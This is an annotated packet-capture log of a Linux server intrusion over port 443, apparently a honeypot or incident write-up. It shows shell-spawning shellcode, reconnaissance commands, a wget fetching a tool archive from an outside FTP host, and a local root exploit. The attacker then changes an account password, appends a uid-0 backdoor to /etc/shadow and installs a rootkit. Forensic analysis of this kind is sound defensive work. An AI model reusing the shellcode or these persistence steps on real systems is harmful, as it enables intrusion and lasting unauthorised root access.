10/26-01:59:45.898293 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x7A xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42170 IpLen:20 DgmLen:108 DF ***AP*** Seq: 0x331D2CB1 Ack: 0x1CE99A67 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119471420 11526911 31 C9 80 C1 03 31 C0 B0 3F 49 CD 80 75 F7 31 C9 1....1..?I..u.1. F7 E1 51 5B B0 A4 CD 80 31 C0 50 68 2F 2F 73 68 ..Q[....1.Ph//sh 68 2F 62 69 6E 89 E3 50 53 89 E1 99 B0 0B CD 80 h/bin..PS....... 31 DB F7 E3 40 CD 80 00 1...@... Start the /bin/bash 10/26-01:59:47.840032 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x6F xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42205 IpLen:20 DgmLen:97 DF ***AP*** Seq: 0x331D2CE9 Ack: 0x1CE99A67 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119471621 11526945 54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 78 70 6F TERM=xterm; expo 72 74 20 54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 rt TERM=xterm; e 78 65 63 20 62 61 73 68 20 2D 69 0A 0A xec bash -i.. Check out the victim host 10/26-01:59:48.102876 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x54 xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42206 IpLen:20 DgmLen:70 DF ***AP*** Seq: 0x331D2D16 Ack: 0x1CE99A67 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119471647 11527139 75 6E 61 6D 65 20 2D 61 3B 20 69 64 3B 20 77 3B uname -a; id; w; 0A 0A .. Now get hack tool to hack into root 10/26-02:00:01.087751 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4A xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42226 IpLen:20 DgmLen:60 DF ***AP*** Seq: 0x331D2D28 Ack: 0x1CE99BC6 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119472946 11527176 63 64 20 2F 74 6D 70 0A cd /tmp. 10/26-02:00:04.882959 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4E xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42245 IpLen:20 DgmLen:64 DF ***AP*** Seq: 0x331D2D30 Ack: 0x1CE99BD9 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119473325 11528462 6D 6B 64 69 72 20 22 2E 2E 2E 22 0A mkdir "...". 10/26-02:00:08.680056 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4B xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42266 IpLen:20 DgmLen:61 DF ***AP*** Seq: 0x331D2D3C Ack: 0x1CE99BF0 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119473705 11528868 63 64 20 22 2E 2E 2E 22 0A cd "...". Get the tool 10/26-02:00:26.884480 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x7F xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42290 IpLen:20 DgmLen:113 DF ***AP*** Seq: 0x331D2D4A Ack: 0x1CE99C6C Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119475525 11529373 wget ftp://xxx:xxxx@xxx.xxx.1.200/".. "/test.tgz. ***AP*** Seq: 0x331D2DB7 Ack: 0x1CE99DF8 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119491296 11546608 67 65 74 20 62 61 6E 67 0A get bang. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/26-02:04:06.360680 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4F xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42457 IpLen:20 DgmLen:65 DF ***AP*** Seq: 0x331D2DC0 Ack: 0x1CE99DF8 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119497472 11546816 67 65 74 20 74 65 73 74 2E 74 67 7A 0A get test.tgz. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/26-02:04:06.376540 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x42 192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:28870 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x1CE99DF8 Ack: 0x331D2DCD Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 11552993 119497472 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Run the bang to hack into root 10/26-02:06:05.999877 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x46 xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42479 IpLen:20 DgmLen:56 DF ***AP*** Seq: 0x331D2DCD Ack: 0x1CE99DF8 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119509436 11552993 62 79 65 0A bye. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/26-02:06:06.018343 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x42 192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:29271 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x1CE99DF8 Ack: 0x331D2DD1 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 11564958 119509436 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ ***AP*** Seq: 0x331D2DD1 Ack: 0x1CE99E20 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119509978 11564973 63 68 6D 6F 64 20 2B 78 20 62 61 6E 67 0A chmod +x bang. 10/26-02:06:14.396965 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x49 xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42517 IpLen:20 DgmLen:59 DF ***AP*** Seq: 0x331D2DDF Ack: 0x1CE99E39 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119510276 11565501 2E 2F 62 61 6E 67 0A ./bang. 10/26-02:06:14.439745 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x65 192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:29298 IpLen:20 DgmLen:87 DF ***AP*** Seq: 0x1CE99E40 Ack: 0x331D2DE6 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 11565800 119510276 62 75 67 20 65 78 70 6C 6F 69 74 65 64 20 73 75 bug exploited su 63 63 65 73 73 66 75 6C 6C 79 2E 0A 65 6E 6A 6F ccessfully..enjo 79 21 0A y!. Change nobody password 10/26-02:06:22.406181 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x50 xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42553 IpLen:20 DgmLen:66 DF ***AP*** Seq: 0x331D2DE6 Ack: 0x1CE99E63 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119511077 11565800 70 61 73 73 77 64 20 6E 6F 62 6F 64 79 0A passwd nobody. 10/26-02:06:26.249476 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x5C 192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:29303 IpLen:20 DgmLen:78 DF ***AP*** Seq: 0x1CE99E76 Ack: 0x331D2E00 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 11566981 119511441 52 65 74 79 70 65 20 6E 65 77 20 55 4E 49 58 20 Retype new UNIX 70 61 73 73 77 6F 72 64 3A 20 password: =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/26-02:06:26.515085 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x42 xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42573 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x331D2E00 Ack: 0x1CE99E90 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119511488 11566981 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/26-02:06:29.575436 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4E xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42585 IpLen:20 DgmLen:64 DF ***AP*** Seq: 0x331D2E00 Ack: 0x1CE99E90 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119511794 11566981 6E 65 72 74 68 75 73 31 39 37 36 0A nerthus1976. Install uid account 10/26-02:06:45.506079 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x6D xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42595 IpLen:20 DgmLen:95 DF ***AP*** Seq: 0x331D2E0C Ack: 0x1CE99EE9 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119513386 11567316 65 63 68 6F 20 75 69 64 3A 78 3A 30 3A 30 3A 3A echo uid:x:0:0:: 2F 3A 2F 62 69 6E 2F 62 61 73 68 20 3E 3E 20 2F /:/bin/bash >> / 65 74 63 2F 73 68 61 64 6F 77 0A etc/shadow. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/26-02:06:45.525622 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x42 192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:29306 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x1CE99EE9 Ack: 0x331D2E37 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 11568909 119513386 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/26-02:06:49.733873 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4E xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42612 IpLen:20 DgmLen:64 DF ***AP*** Seq: 0x331D2E37 Ack: 0x1CE99EE9 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119513809 11568909 70 61 73 73 77 64 20 24 75 69 64 0A passwd $uid. 10/26-02:06:49.747136 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x55 192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:29308 IpLen:20 DgmLen:71 DF ***AP*** Seq: 0x1CE99EE9 Ack: 0x331D2E43 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 11569331 119513809 4E 65 77 20 55 4E 49 58 20 70 61 73 73 77 6F 72 New UNIX passwor 64 3A 20 d: =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/26-02:06:50.016972 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x42 xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42615 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x331D2E43 Ack: 0x1CE99EFC Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119513838 11569331 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/26-02:06:53.261344 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4E xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x0 ID:42629 IpLen:20 DgmLen:64 DF ***AP*** Seq: 0x331D2E43 Ack: 0x1CE99EFC Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119514162 11569331 6E 65 72 74 68 75 73 31 39 37 36 0A nerthus1976. Install the rootkit 10/26-02:07:01.483904 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x54 xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x0 ID:42669 IpLen:20 DgmLen:70 DF ***AP*** Seq: 0x331D2E5B Ack: 0x1CE99F4D Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119514984 11569998 74 61 72 20 7A 78 76 66 20 74 65 73 74 2E 74 67 tar zxvf test.tg 7A 0A z. 10/26-02:07:07.757687 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x52 xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42725 IpLen:20 DgmLen:68 DF ***AP*** Seq: 0x331D2E6D Ack: 0x1CE9A495 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119515612 11570575 72 6D 20 2D 72 66 20 74 65 73 74 2E 74 67 7A 0A rm -rf test.tgz. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/26-02:07:07.774136 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x42 192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:29385 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x1CE9A495 Ack: 0x331D2E7D Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 11571134 119515612 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/26-02:07:11.033743 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4A xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42738 IpLen:20 DgmLen:60 DF ***AP*** Seq: 0x331D2E7D Ack: 0x1CE9A495 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119515939 11571134 63 64 20 74 65 73 74 0A cd test. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/26-02:07:11.053901 0:D0:9:4E:46:C -> 0:50:FC:2B:1B:C5 type:0x800 len:0x42 192.168.20.1:443 -> xxx.xxx.113.196:2613 TCP TTL:64 TOS:0x0 ID:29386 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x1CE9A495 Ack: 0x331D2E85 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 11571462 119515939 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/26-02:07:16.475146 0:50:FC:2B:1B:C5 -> 0:D0:9:4E:46:C type:0x800 len:0x4C xxx.xxx.113.196:2613 -> 192.168.20.1:443 TCP TTL:44 TOS:0x60 ID:42755 IpLen:20 DgmLen:62 DF ***AP*** Seq: 0x331D2E85 Ack: 0x1CE9A495 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 119516483 11571462 2E 2F 69 6E 73 74 61 6C 6C 0A ./install. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+